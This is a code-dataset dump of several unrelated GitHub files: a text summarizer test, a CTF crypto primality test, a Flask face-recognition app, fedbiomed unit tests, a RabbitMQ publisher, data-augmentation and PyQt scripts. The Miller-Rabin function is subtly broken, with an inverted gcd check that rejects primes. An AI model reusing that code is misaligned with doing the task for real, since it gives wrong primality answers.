fp.write(raw_limited_summary)\n\n print(\"\\n\\n\", i, \"\\n\\n\", raw_limited_summary)\n limited_summary = Document(output_dir + \"limited_summary_%d.txt\" %i,\n lemmatizer)\n try:\n print(\"\\nReadability\", flesch_kincaid(limited_summary.tok_sentences))\n except:\n pass\n","repo_name":"elmugrearturo/multilang_summarizer","sub_path":"tests/test_english.py","file_name":"test_english.py","file_ext":"py","file_size_in_byte":2592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"70557776533","text":"import random\nfrom cryptolib.utils.common import gcd\n\n\n##\n# Test a number n if the number is prime\n#\n# @params n Number to test\n# @params rounds Number of rounds to test\ndef millerrabin(n, rounds=128):\n # n have to be odd and greater 2\n if n & 1 == 0 or n <= 2:\n return False\n s = n - 1\n t = 0\n # search the t which produces the equation 2^t*s = n-1\n while s & 1 == 0:\n s = s // 2\n t = t + 1\n\n # loop until the probability of a false result is small enough\n # default value 128 produce a probability of 2^(-128)\n k = 0\n while k < rounds:\n a = random.randint(2, n - 1)\n if gcd(a, n) == 1:\n return False\n v = pow(a, s, n)\n if v != 1:\n i = 0\n while v != n - 1:\n if i == t - 1:\n return False\n else:\n v = pow(v, 2, n)\n i += 1\n k += 2\n\n return True\n","repo_name":"CryptoMathician/ctf-cryptolib","sub_path":"cryptolib/utils/primes/primetests.py","file_name":"primetests.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"34644856010","text":"from flask import Flask, Response\r\nfrom flask.templating import render_template\r\nimport click\r\nimport cv2\r\nfrom dotenv import load_dotenv\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom flask_migrate import Migrate\r\nfrom flask_login import LoginManager\r\n\r\nfrom config import Config\r\nfrom src.core.face_verificator import FaceVerificator\r\nfrom src.core.face_encoder import FaceEncoder\r\nfrom src.core.face_detector import FaceDetector\r\n\r\nload_dotenv()\r\n\r\ndb = SQLAlchemy()\r\n\r\napp = Flask(__name__)\r\n\r\napp.config.from_object(Config)\r\n\r\ndb.init_app(app)\r\nmigrate = Migrate(app, db)\r\n\r\nlogin_manager = LoginManager()\r\nlogin_manager.login_view = 'admin.login'\r\nlogin_manager.login_message_category = 'danger'\r\nlogin_manager.init_app(app)\r\n\r\n\r\nface_detector = FaceDetector()\r\nface_encoder = FaceEncoder()\r\nface_recognizer = FaceVerificator()\r\n\r\ncamera = cv2.VideoCapture(0)\r\n\r\n\r\nprint(\"All class sucessfully loaded!\")\r\n\r\n\r\nfrom api.controllers.role import RoleController\r\nfrom api.controllers.user import UserController\r\n\r\nrole_controller = RoleController()\r\nuser_controller = UserController()\r\n\r\n@app.cli.command('seed')\r\n@click.argument('args')\r\ndef seed(args):\r\n\r\n if args == 'role':\r\n role_controller.create(name='user')\r\n role_controller.create(name='admin')\r\n print('Role has been seeded')\r\n return\r\n\r\n if args == 'admin':\r\n user_controller.create(\r\n name=Config.ADMIN_NAME,\r\n email=Config.ADMIN_EMAIL,\r\n role_id=role_controller.fetch_by_name('admin').id,\r\n password=Config.ADMIN_PASSWORD\r\n )\r\n print('Dummy admin has been seeded')\r\n return\r\n\r\n\r\ndef get_frame():\r\n while True:\r\n success, frame = camera.read()\r\n if not success:\r\n break\r\n else:\r\n start_point, end_point = face_detector.get_face_boundary(frame)\r\n cv2.rectangle(frame, start_point, end_point, (0, 255, 0), 2)\r\n ret, buffer = cv2.imencode('.jpg', img=frame)\r\n frame_bytes = buffer.tobytes()\r\n yield (b'--frame\\r\\n'\r\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame_bytes + b'\\r\\n')\r\n\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template('index.html')\r\n\r\n\r\n@app.route('/video')\r\ndef video():\r\n return Response(get_frame(), mimetype='multipart/x-mixed-replace; boundary=frame')\r\n\r\n\r\n@login_manager.user_loader\r\ndef load_user(user_id):\r\n return user_controller.fetch_by_id(user_id)\r\n\r\nfrom api.routes.service import service\r\n\r\napp.register_blueprint(service, url_prefix='/')\r\n\r\nfrom api.routes.user import user\r\nfrom api.routes.admin import admin\r\n\r\nadmin.register_blueprint(user, url_prefix='/user')\r\napp.register_blueprint(admin, url_prefix='/admin')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)\r\n","repo_name":"ukayaj620/precencia","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"67"} +{"seq_id":"17317325918","text":"import unittest\nimport logging\nfrom unittest.mock import patch\nfrom fedbiomed.common.data import DataLoadingPlan, DataLoadingPlanMixin, MapperBlock\nfrom testsupport.testing_data_loading_block import LoadingBlockForTesting, LoadingBlockTypesForTesting, \\\n TestAbstractsBlock\nfrom fedbiomed.common.exceptions import FedbiomedLoadingBlockError, FedbiomedLoadingBlockValueError, \\\n FedbiomedDataLoadingPlanValueError, FedbiomedDataLoadingPlanError\nfrom fedbiomed.common.constants import DatasetTypes\n\n\nclass TestDataLoadingBlock(unittest.TestCase):\n def setUp(self):\n self.changed_data = {'my': 'different-data'}\n self.dlb1 = LoadingBlockForTesting()\n self.dlb2 = LoadingBlockForTesting()\n\n def test_data_loading_block_01_serialize_and_load(self):\n \"\"\"Tests that DataLoadingBlock is serialized and loaded correctly\"\"\"\n self.dlb1.data = self.changed_data\n self.assertFalse(self.dlb1.data == self.dlb2.data)\n serialized = self.dlb1.serialize()\n self.assertIn('loading_block_class', serialized)\n self.assertIn('loading_block_module', serialized)\n self.assertIn('dlb_id', serialized)\n\n self.dlb2.deserialize(serialized)\n self.assertDictEqual(self.dlb1.data, self.dlb2.data)\n\n exec(f\"import {serialized['loading_block_module']}\")\n dlb3 = eval(f\"{serialized['loading_block_module']}.{serialized['loading_block_class']}()\")\n dlb3.deserialize(serialized)\n self.assertDictEqual(self.dlb1.data, dlb3.data)\n\n dlb4 = MapperBlock()\n dlb4.map = {'test': 1, 1: 'test'}\n serialized = dlb4.serialize()\n exec(f\"import {serialized['loading_block_module']}\")\n dlb5 = eval(f\"{serialized['loading_block_module']}.{serialized['loading_block_class']}()\")\n dlb5.deserialize(serialized)\n self.assertEqual(dlb4.get_serialization_id(), dlb5.get_serialization_id())\n self.assertDictEqual(dlb4.map, dlb5.map)\n\n with self.assertLogs('fedbiomed', logging.DEBUG) as captured:\n with self.assertRaises(FedbiomedLoadingBlockValueError):\n dlb5.deserialize({'wrong-data': 'should-not-be-here', **serialized})\n self.assertEqual(captured.output[-1],\n 'CRITICAL:fedbiomed:FB614: data loading block error: '\n 'undefined key (wrong-data) in scheme')\n with self.assertRaises(FedbiomedLoadingBlockValueError):\n dlb5.deserialize({**serialized, 'loading_block_class': 'Wrong._format.__*$class.name'})\n self.assertEqual(captured.output[-1],\n 'CRITICAL:fedbiomed:FB614: data loading block error: '\n '__*$class within Wrong._format.__*$class.name is not a '\n 'valid class name for deserialization of Data Loading Block.')\n with self.assertRaises(FedbiomedLoadingBlockValueError):\n dlb5.deserialize({**serialized, 'loading_block_module': '9Wrong.format.module.name'})\n self.assertEqual(captured.output[-1],\n 'CRITICAL:fedbiomed:FB614: data loading block error: '\n '9Wrong within 9Wrong.format.module.name is not a valid '\n 'class name for deserialization of Data Loading Block.')\n with self.assertRaises(FedbiomedLoadingBlockValueError):\n dlb5.deserialize({**serialized, 'dlb_id': 'serialized_dlb_wrong-format-uuid'})\n self.assertEqual(captured.output[-1],\n 'CRITICAL:fedbiomed:FB614: data loading block error: '\n 'serialized_dlb_wrong-format-uuid is not of the form '\n 'serialized_dlb_ for deserialization of Data Loading Block.')\n with self.assertRaises(FedbiomedLoadingBlockValueError):\n dlb5.deserialize({**serialized, 'dlb_id': 'wrong-format-id'})\n self.assertEqual(captured.output[-1],\n 'CRITICAL:fedbiomed:FB614: data loading block error: '\n 'wrong-format-id is not of the form serialized_dlb_ '\n 'for deserialization of Data Loading Block.')\n\n def test_data_loading_block_02_apply(self):\n \"\"\"Tests that the apply function of DataLoadingBlock works as intended\"\"\"\n self.dlb2.data = self.changed_data\n dlb3 = MapperBlock()\n dlb3.map = self.changed_data\n\n apply_1 = self.dlb1.apply()\n self.assertEqual(len(apply_1), 1)\n self.assertIn('data', apply_1)\n apply_2 = self.dlb2.apply()\n self.assertEqual(len(apply_2), 1)\n self.assertIn('different-data', apply_2)\n apply_3 = dlb3.apply('my')\n self.assertEqual(apply_3, 'different-data')\n with self.assertRaises(FedbiomedLoadingBlockError):\n dlb3.apply('not-my')\n\n def test_data_loading_block_03_abstract(self):\n \"\"\"Tests for abstract method(s) of DataLoadingBlock\"\"\"\n\n # block class to cheat ABC into running abstract method(s)\n dlb = TestAbstractsBlock()\n apply = dlb.apply(\"some\", [\"arbitrary\", 3], \"arguments\", {}, 8)\n\n self.assertEqual(apply, None)\n\n\nclass TestDataLoadingPlan(unittest.TestCase):\n def setUp(self):\n self.dlb1 = LoadingBlockForTesting()\n self.dlb2 = LoadingBlockForTesting()\n self.assertDictEqual(self.dlb1.data, self.dlb2.data)\n self.dlb2.data = {'my': 'different-data'}\n \n # patchers\n self.patcher_infer_dataset = patch('fedbiomed.common.data.DataLoadingPlan.infer_dataset_type',\n lambda x: DatasetTypes.NONE)\n\n def test_data_loading_plan_01_interface(self):\n \"\"\"Tests that DataLoadingPlan exposes the correct interface to the developer\"\"\"\n dlp = DataLoadingPlan()\n dlp[LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING] = self.dlb1\n dlp[LoadingBlockTypesForTesting.OTHER_LOADING_BLOCK_FOR_TESTING] = self.dlb2\n self.assertIn(LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING, dlp)\n self.assertIn(LoadingBlockTypesForTesting.OTHER_LOADING_BLOCK_FOR_TESTING, dlp)\n self.assertDictEqual(self.dlb1.data, dlp[LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING].data)\n self.assertDictEqual(self.dlb2.data, dlp[LoadingBlockTypesForTesting.OTHER_LOADING_BLOCK_FOR_TESTING].data)\n\n it = iter(dlp.items())\n first_key, first_dlb = next(it)\n self.assertEqual(first_key, LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING)\n self.assertDictEqual(self.dlb1.data, first_dlb.data)\n second_key, second_dlb = next(it)\n self.assertEqual(second_key, LoadingBlockTypesForTesting.OTHER_LOADING_BLOCK_FOR_TESTING)\n self.assertDictEqual(self.dlb2.data, second_dlb.data)\n\n str_repr = str(dlp)\n self.assertIn(dlp.dlp_id, str_repr)\n self.assertIn(LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING.value, str_repr)\n self.assertIn(LoadingBlockTypesForTesting.OTHER_LOADING_BLOCK_FOR_TESTING.value, str_repr)\n\n with self.assertRaises(FedbiomedDataLoadingPlanValueError):\n dlp['string'] = self.dlb1\n with self.assertRaises(FedbiomedDataLoadingPlanValueError):\n dlp[LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING] = {}\n\n def test_data_loading_plan_02_serialize_and_deserialize(self):\n \"\"\"Tests that a DataLoadingPlan can be serialized and loaded correctly\"\"\"\n dlp = DataLoadingPlan()\n dlp[LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING] = self.dlb1\n dlp[LoadingBlockTypesForTesting.OTHER_LOADING_BLOCK_FOR_TESTING] = self.dlb2\n dlp2 = DataLoadingPlan()\n self.assertNotEqual(dlp.dlp_id, dlp2.dlp_id)\n self.assertNotIn(LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING, dlp2)\n self.assertNotIn(LoadingBlockTypesForTesting.OTHER_LOADING_BLOCK_FOR_TESTING, dlp2)\n\n serialized_dlp, serialized_loading_blocks = dlp.serialize()\n self.assertIn('dlp_id', serialized_dlp)\n self.assertIsInstance(serialized_dlp['dlp_id'], str)\n self.assertIn('dlp_name', serialized_dlp)\n self.assertIsInstance(serialized_dlp['dlp_name'], str)\n self.assertIn('loading_blocks', serialized_dlp)\n self.assertIsInstance(serialized_dlp['loading_blocks'], dict)\n self.assertEqual(len(serialized_dlp['loading_blocks']), 2)\n self.assertIn('key_paths', serialized_dlp)\n self.assertIsInstance(serialized_dlp['key_paths'], dict)\n\n self.assertIsInstance(serialized_loading_blocks, list)\n self.assertEqual(len(serialized_loading_blocks), 2)\n self.assertIn('dlb_id', serialized_loading_blocks[0])\n self.assertIn('dlb_id', serialized_loading_blocks[1])\n\n self.assertIn(serialized_loading_blocks[0]['dlb_id'],\n serialized_dlp['loading_blocks'].values())\n self.assertIn(serialized_loading_blocks[1]['dlb_id'],\n serialized_dlp['loading_blocks'].values())\n\n dlp2.deserialize(*dlp.serialize())\n self.assertIn(LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING, dlp2)\n self.assertIn(LoadingBlockTypesForTesting.OTHER_LOADING_BLOCK_FOR_TESTING, dlp2)\n self.assertEqual(dlp.dlp_id, dlp2.dlp_id)\n\n dlp_values = dlp[LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING].apply()\n dlp2_values = dlp2[LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING].apply()\n for v1, v2 in zip(dlp_values, dlp2_values):\n self.assertEqual(v1, v2)\n\n with self.assertRaises(FedbiomedLoadingBlockError):\n dlp_metadata, dlbs_metadata = dlp.serialize()\n dlbs_metadata[0]['loading_block_class'] = 'WrongClass'\n DataLoadingPlan().deserialize(dlp_metadata, dlbs_metadata)\n\n with self.assertRaises(FedbiomedDataLoadingPlanError):\n dlp_metadata, dlbs_metadata = dlp.serialize()\n dlp_metadata['key_paths'][LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING.value] = \\\n ('WrongKeyModule', 'WrongKeyName')\n DataLoadingPlan().deserialize(dlp_metadata, dlbs_metadata)\n\n def test_data_loading_plan_03_mixin_functionality(self):\n \"\"\"Tests that the DataLoadingPlanMixin class provides the intended functionality\"\"\"\n class MyDataset(DataLoadingPlanMixin):\n def __init__(self):\n super(MyDataset, self).__init__()\n\n @staticmethod\n def get_dataset_type():\n return DatasetTypes.TEST\n\n tp = MyDataset()\n dlp = DataLoadingPlan()\n dlp[LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING] = self.dlb1\n dlp[LoadingBlockTypesForTesting.OTHER_LOADING_BLOCK_FOR_TESTING] = self.dlb2\n dlp.target_dataset_type = DatasetTypes.TEST\n\n # heuristic test that no DLP exist for dataset\n apply_1 = tp.apply_dlb(\"my default\", LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING)\n self.assertEqual(apply_1, \"my default\")\n apply_2 = tp.apply_dlb(\"other default\", LoadingBlockTypesForTesting.OTHER_LOADING_BLOCK_FOR_TESTING)\n self.assertEqual(apply_2, \"other default\")\n\n # test that DLP is properly set for dataset\n tp.set_dlp(DataLoadingPlan().deserialize(*dlp.serialize()))\n apply_1 = list(tp.apply_dlb(\"my default\", LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING))\n self.assertEqual(apply_1, ['data'])\n apply_2 = list(tp.apply_dlb(\"other default\", LoadingBlockTypesForTesting.OTHER_LOADING_BLOCK_FOR_TESTING))\n self.assertEqual(apply_2, ['different-data']) \n\n # test DLP was properly cleared\n tp.clear_dlp()\n apply_1 = tp.apply_dlb(\"my default\", LoadingBlockTypesForTesting.LOADING_BLOCK_FOR_TESTING)\n self.assertEqual(apply_1, \"my default\")\n apply_2 = tp.apply_dlb(\"other default\", LoadingBlockTypesForTesting.OTHER_LOADING_BLOCK_FOR_TESTING)\n self.assertEqual(apply_2, \"other default\")\n \n # try to set an object that is not of DataLoadingPlan type\n with self.assertRaises(FedbiomedDataLoadingPlanValueError):\n tp.set_dlp(dict())\n \n tp.clear_dlp()\n self.patcher_infer_dataset.start()\n with self.assertRaises(FedbiomedDataLoadingPlanValueError):\n tp.set_dlp(DataLoadingPlan().deserialize(*dlp.serialize()))\n self.patcher_infer_dataset.stop()\n\n def test_data_loading_plan_04_apply(self):\n \"\"\"Tests application of a DataLoadingPlan's DataLoadingBlock\"\"\"\n class MyDataset(DataLoadingPlanMixin):\n def __init__(self):\n super(MyDataset, self).__init__()\n\n def test_mapper(self):\n orig_key = 'orig-key'\n return self.apply_dlb(orig_key, LoadingBlockTypesForTesting.TESTING_MAPPER, orig_key)\n\n @staticmethod\n def get_dataset_type():\n return DatasetTypes.TEST\n\n dlb = MapperBlock()\n dlb.map = {'orig-key': 'new-key'}\n dlp = DataLoadingPlan()\n dlp[LoadingBlockTypesForTesting.TESTING_MAPPER] = dlb\n\n tp = MyDataset()\n self.assertEqual(tp.test_mapper(), 'orig-key')\n tp.set_dlp(dlp)\n self.assertEqual(tp.test_mapper(), 'new-key')\n\n with self.assertRaises(FedbiomedDataLoadingPlanValueError):\n tp.apply_dlb('some value', 'wrong-key-type')\n\n # testing clearing feature\n tp.clear_dlp()\n self.assertEqual(tp.test_mapper(), 'orig-key')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"fedbiomed/fedbiomed","sub_path":"tests/test_data_loading_plan.py","file_name":"test_data_loading_plan.py","file_ext":"py","file_size_in_byte":13758,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"67"} +{"seq_id":"31247108943","text":"import pika\nimport numpy as np\nimport json\nimport uuid\nimport os\nimport logging\nfrom flask import Flask\nfrom flask_restful import Resource, Api\nlogging.getLogger('pika').setLevel(logging.INFO)\n\n\nclass Publisher:\n def __init__(self):\n self.setup_queue() # create a rabbitmq queue\n if self.connection or self.connection.is_closed:\n self.setup_queue()\n \n def setup_queue(self): \n \n \"\"\" create a rabbitmq connection with rpc like setup to send request \n and receive back the response \"\"\"\n \n amqp_url = os.environ['AMQP_URL']\n print('Connecting in Publisher to : ', amqp_url)\n self.parameters = pika.URLParameters(amqp_url)\n self.connection = pika.BlockingConnection(self.parameters)\n self.channel = self.connection.channel()\n result = self.channel.queue_declare(queue='', exclusive=True)\n self.callback_queue = result.method.queue\n self.channel.basic_consume(\n queue=self.callback_queue,\n on_message_callback=self.on_response,\n auto_ack=True) \n \n def publish_data_to_predictorqueue(self, data):\n \n \"\"\"sending data to predictor and setting up the call back queue \n to receive back the response\"\"\"\n \n self.response = None\n self.corr_id = str(uuid.uuid4())\n self.channel.basic_publish(\n exchange='',\n routing_key='Predictor',\n properties=pika.BasicProperties(\n reply_to=self.callback_queue,\n correlation_id=self.corr_id,\n ),\n body=data)\n while self.response is None:\n self.connection.process_data_events()\n return float(self.response)\n\n def on_response(self, ch, method, props, body):\n \n \"\"\"get response and compare the correlation id \n to process the response\"\"\"\n \n if self.corr_id == props.correlation_id:\n self.response = body\n \n \nclass DataSourceHandler(Resource):\n \n def dataDefault(self, obj):\n \n \"\"\" default object to process data from json \"\"\"\n \n if type(obj).__module__ == np.__name__:\n if isinstance(obj, np.ndarray):\n return obj.tolist()\n else:\n return obj.item()\n raise TypeError('Unknown type:', type(obj))\n \n def get(self, dataSource):\n \n \"\"\" API method to return probability data response \"\"\" \n try:\n print(\"Data source given : \", dataSource)\n try:\n publisher = Publisher()\n except:\n result = {\"Error\" :\"There is an error in Establishing Rabbitmq connection in publisher\"}\n try:\n sourceData = self.getSourceData(dataSource)\n result = self.getResponseProbabilityData(sourceData, dataSource, publisher)\n except:\n result = {\"Error\" :\"There is an error in Processing data\"}\n \n return (json.loads(json.dumps(result)))\n except:\n result = {\"Error\" :\"There is an error in Publishing data\"}\n return result\n \n \n def getSourceData(self, dataSource):\n \n \"\"\"processing data with numpy\"\"\"\n \n sourceData = np.loadtxt(dataSource, delimiter=',', skiprows=1)\n sourceData.reshape(-1, 1)\n return sourceData\n \n def getResponseProbabilityData(self, sourceData, dataSource, publisher):\n \n \"\"\"getting predictor data result, sending one row at a time to the queue\n assuming data file can be huge \"\"\"\n \n result = []\n for row in sourceData: \n requestData = row[1:4]\n requestData = requestData.reshape(1, -1)\n requestBody = json.dumps(requestData, default=self.dataDefault)\n print(\"Sent \", requestBody, \" to Queue\")\n response = publisher.publish_data_to_predictorqueue(requestBody)\n print(\" Probability that the given source belongs to Class 1 : \", response)\n result.append({'dataSource': dataSource,\n 'inputData': requestBody, 'probability': response})\n return result\n \n \napp = Flask(__name__)\napi = Api(app)\napi.add_resource(DataSourceHandler, \"/api/predict/\")\n\n \nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=80, debug=True)\n","repo_name":"snehapvs/PythonRabbitmqApp","sub_path":"publisher/PublishMessage.py","file_name":"PublishMessage.py","file_ext":"py","file_size_in_byte":4454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"22607221685","text":"import os, sys\nfrom distutils.core import setup, Extension\nfrom Cython import cythonize\n\nsupport_dir = \"/Users/aloukian/Documents/fdm/pycxx\"\n\nif os.name == 'posix':\n CXX_libraries = ['stdc++','m']\nelse:\n CXX_libraries = []\n\nsetup(\n name = \"FDM\", \n version = \"0.01\", \n maintainer = \"Anton Loukianov\", \n maintainer_email = \"aloukian@umich.edu\", \n description = \"Filter diagonalization module for python.\", \n url = \"\", \n ext_modules = [\n Extension('_fdm',\n define_macros= [('USE_THREAD',), ('DEBUG',), ('PYCXX_DEBUG',)],\n undef_macros=['NDEBUG'],\n sources = [\n 'fdm_ctx.cpp',\n 'fdm_module.cpp', \n os.path.join(support_dir,'Src/cxxsupport.cxx'), \n os.path.join(support_dir,'Src/cxx_extensions.cxx'), \n os.path.join(support_dir,'Src/IndirectPythonInterface.cxx'), \n os.path.join(support_dir,'Src/cxxextensions.c')\n ],\n include_dirs = [support_dir, \n os.path.join(support_dir, '../armadillo/include'),\n '/usr/local/Cellar/openblas/0.2.6/include',\n '/Users/aloukian/Compile/harminv-1.3.1/',\n ],\n libraries = ['openblas', 'harminv'],\n library_dirs = ['/usr/local/Cellar/openblas/0.2.6/lib'],\n extra_compile_args = ['-O0'],\n extra_link_args= ['-L/usr/local/Cellar/harminv/1.3.1/lib \\\n -L/usr/local/Cellar/gfortran/4.8.1/gfortran/lib/gcc/x86_64-apple-darwin12.3.0/4.8.1 \\\n -L/usr/local/Cellar/gfortran/4.8.1/gfortran/lib/gcc/x86_64-apple-darwin12.3.0/4.8.1/../../.. \\\n -lharminv -llapack -lblas -lm -lgfortran -lSystem -lgcc_ext.10.5 \\\n -lquadmath -lm'],\n )\n \n ],\n)\n","repo_name":"antonl/fdmtools","sub_path":"make.py","file_name":"make.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"42524250608","text":"# -*- coding: utf-8 -*-\n# ------------------------------------------------------------------ import(s)\nimport sys\n\nimport collada.collada_type as co_type\n\n\n# ------------------------------------------------------------------- param(s)\n# ------------------------------------------------------------------- class(s)\n# ---------------------------------------------------------------- function(s)\n# ============================================================================\ndef load_library_materials(collada_scene, xml_node_library, logger=None):\n\n resource_ridx = 1\n\n for xml_node in xml_node_library.getElementsByTagName(\"material\"):\n attr_id = xml_node.getAttribute(\"id\")\n attr_name = xml_node.getAttribute(\"name\")\n\n o_material = co_type.CMaterial()\n o_material.attr_id = attr_id\n o_material.attr_name = attr_name\n\n if collada_scene.o_argv.MATERIAL is None:\n o_material.resource_ridx = resource_ridx\n collada_scene.dict_material[attr_id] = o_material\n\n logger.debug(\"material> id = %s, name = %s (resource_idx = %d)\", attr_id, attr_name, resource_ridx)\n\n resource_ridx += 1\n\n elif o_material.attr_id in collada_scene.o_argv.MATERIAL:\n o_material.resource_ridx = resource_ridx\n collada_scene.dict_material[attr_id] = o_material\n\n logger.debug(\"material> id = %s, name = %s (resource_idx = %d)\", attr_id, attr_name, resource_ridx)\n\n resource_ridx += 1\n\n return True\n\n\n\n# [EOF]\n","repo_name":"MizunagiKB/collada2tres","sub_path":"collada/lib_material.py","file_name":"lib_material.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"16716234734","text":"import os\nfrom PIL import Image\nimport numpy as np\n\n\ndef data_aug(input_path, save_path, current_scene_num):\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n scene_dir = np.sort(os.listdir(input_path))\n for f in scene_dir:\n print(f)\n\n image_path = os.path.join(input_path, f, 'image')\n gt_path = os.path.join(input_path, f, 'gt')\n voxel_path = os.path.join(input_path, f, 'voxels')\n\n # 90\n current_scene_num += 1\n image_save_path_90 = os.path.join(save_path, 'scene{:04d}'.format(current_scene_num), 'image')\n gt_save_path_90 = os.path.join(save_path, 'scene{:04d}'.format(current_scene_num), 'gt')\n voxel_save_path_90 = os.path.join(save_path, 'scene{:04d}'.format(current_scene_num), 'voxels')\n\n # 180\n current_scene_num += 1\n image_save_path_180 = os.path.join(save_path, 'scene{:04d}'.format(current_scene_num), 'image')\n gt_save_path_180 = os.path.join(save_path, 'scene{:04d}'.format(current_scene_num), 'gt')\n voxel_save_path_180 = os.path.join(save_path, 'scene{:04d}'.format(current_scene_num), 'voxels')\n\n # up and down\n current_scene_num += 1\n image_save_path_ud = os.path.join(save_path, 'scene{:04d}'.format(current_scene_num), 'image')\n gt_save_path_ud = os.path.join(save_path, 'scene{:04d}'.format(current_scene_num), 'gt')\n voxel_save_path_ud = os.path.join(save_path, 'scene{:04d}'.format(current_scene_num), 'voxels')\n\n\n if not os.path.exists(image_save_path_90):\n os.makedirs(image_save_path_90)\n os.makedirs(gt_save_path_90)\n os.makedirs(voxel_save_path_90)\n\n os.makedirs(image_save_path_180)\n os.makedirs(gt_save_path_180)\n os.makedirs(voxel_save_path_180)\n\n os.makedirs(image_save_path_ud)\n os.makedirs(gt_save_path_ud)\n os.makedirs(voxel_save_path_ud)\n\n # loop image\n for ff in np.sort(os.listdir(image_path)):\n file = os.path.join(image_path, ff)\n image = Image.open(file)\n image_90 = image.transpose(Image.ROTATE_90)\n image_180 = image.transpose(Image.ROTATE_180)\n image_ud = image.transpose(Image.FLIP_TOP_BOTTOM)\n\n # save per image\n image_90.save(os.path.join(image_save_path_90, ff))\n image_180.save(os.path.join(image_save_path_180, ff))\n image_ud.save(os.path.join(image_save_path_ud, ff))\n\n # loop gt\n for ff in np.sort(os.listdir(gt_path)):\n file = os.path.join(gt_path, ff)\n gt = Image.open(file)\n gt_90 = gt.transpose(Image.ROTATE_90)\n gt_180 = gt.transpose(Image.ROTATE_180)\n gt_ud = gt.transpose(Image.FLIP_TOP_BOTTOM)\n\n # save per gt\n gt_90.save(os.path.join(gt_save_path_90, ff))\n gt_180.save(os.path.join(gt_save_path_180, ff))\n gt_ud.save(os.path.join(gt_save_path_ud, ff))\n\n # loop event\n for ff in np.sort(os.listdir(voxel_path)):\n file = os.path.join(voxel_path, ff)\n event = np.load(file)\n\n event_90 = []\n event_180 = []\n event_ud = []\n # 分片旋转\n for i in range(event.shape[0]):\n event_90.append(np.rot90(event[i], 1))\n event_180.append(np.rot90(event[i], 2)) # 逆时针180度\n event_ud.append(np.flip(event[i], axis=0)) # 上下翻转\n\n event_90 = np.array(event_90)\n event_180 = np.array(event_180)\n event_ud = np.array(event_ud)\n np.save(os.path.join(voxel_save_path_90, ff), event_90)\n np.save(os.path.join(voxel_save_path_180, ff), event_180)\n np.save(os.path.join(voxel_save_path_ud, ff), event_ud)\n\n\nif __name__ == '__main__':\n input_path = '../data/dataset_voxel_0717/train_outdoor'\n save_path = '../data/dataset_voxel_0717/aug_data'\n init_scene_num = 744\n data_aug(input_path, save_path, init_scene_num)\n\n # change scene num name\n # file = np.sort(os.listdir(input_path))\n # for f in file:\n # scene_path = os.path.join(input_path, f)\n # num = int(scene_path[-4:]) + 300\n #\n # os.rename(scene_path, input_path + '/scene{:04d}'.format(num))\n\n print(\"process end!\")","repo_name":"diamondxx/LIE-code","sub_path":"utils/data_aug.py","file_name":"data_aug.py","file_ext":"py","file_size_in_byte":4367,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"67"} +{"seq_id":"71531713492","text":"import sys\r\nfrom PyQt5.QtWidgets import (QWidget, QToolTip, QPushButton, QApplication)\r\nfrom PyQt5.QtGui import QFont\r\n\r\nclass Example(QWidget):\r\n\tdef __init__(self):\r\n\t\tsuper().__init__()\r\n\t\tself.initUI()\r\n\r\n\tdef initUI(self):\r\n\t\tQToolTip.setFont(QFont('SansSerif',10))\r\n\t\t#This static method sets a font used to render tooltips.We use a 10px Sanserif font\r\n\r\n\t\tself.setToolTip(\"This is a QWidget widget\")\r\n\t\t#To create a tooltip, we call the setTooltip() method\r\n\t\tbtn=QPushButton('Button',self)\r\n\t\tbtn.setToolTip('This is a QPushButton widget')\r\n\t\t#We create a Push button widget and create a tooltip for it\r\n\t\tbtn.resize(btn.sizeHint())\r\n\t\tbtn.move(50,50)\r\n\t\t#The button is being resized and moved on the window. The sizeHint() method gives a recommended size\r\n\t\t#for the button\r\n\r\n\t\tself.setGeometry(300,300,300,200)\r\n\t\tself.setWindowTitle('Tootips')\r\n\t\tself.show()\r\n\r\nif __name__=='__main__':\r\n\tapp=QApplication(sys.argv)\r\n\tex=Example()\r\n\tsys.exit(app.exec_())","repo_name":"dibakarbose/PyQt","sub_path":"PracticeCodes/3_tooltip.py","file_name":"3_tooltip.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"44544833419","text":"import sys\nINF = int(1e9)\nn,m = map(int, sys.stdin.readline().split())\ngraph = [[INF]*(n+1) for _ in range(n+1)]\nfor _ in range(m):\n\ta,b = map(int, 